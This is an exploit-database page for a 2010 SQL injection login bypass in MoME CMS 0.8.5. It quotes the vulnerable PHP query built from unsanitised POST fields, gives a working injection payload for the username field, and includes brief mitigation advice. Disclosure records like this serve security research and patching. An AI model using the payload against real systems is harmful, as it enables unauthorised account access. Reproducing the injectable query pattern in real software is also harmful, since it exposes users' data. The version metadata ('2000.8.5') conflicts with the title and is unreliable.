MoME CMS - exploit.company

vendor:

MoME CMS

by:

cr4wl3r

N/A

CVSS

N/A

Remote Login Bypass

CWE

Product Name: MoME CMS

Affected Version From: 2000.8.5

Affected Version To: 2000.8.5

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Unknown

2010

MoME CMS <= 0.8.5 Remote Login Bypass Exploit

This exploit allows remote attackers to bypass the login functionality in MoME CMS version 0.8.5. It works only when magic_quotes_gpc is turned off. The vulnerability is discovered by cr4wl3r and the code snippet provided shows how the exploit works.

Mitigation:

Enable magic_quotes_gpc to prevent this exploit. Upgrade to a newer version of MoME CMS if available.

Source

Exploit-DB raw data:

                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   |    MoME CMS <= 0.8.5 Remote Login Bypass Exploit   |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------

[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://sourceforge.net/projects/mome/files/
[!] Date: 16.01.2010
[!] Remote: yes


[!] Code :


//controllo user e passwd da login
 if(isset($_POST['posted_username']) && isset($_POST['posted_password'])) {
        $query="SELECT * FROM users WHERE username='$_POST[posted_username]' AND
password=md5('$_POST[posted_password]')";


[!] PoC:

    username : ' or '1=1
    password : cr4wl3r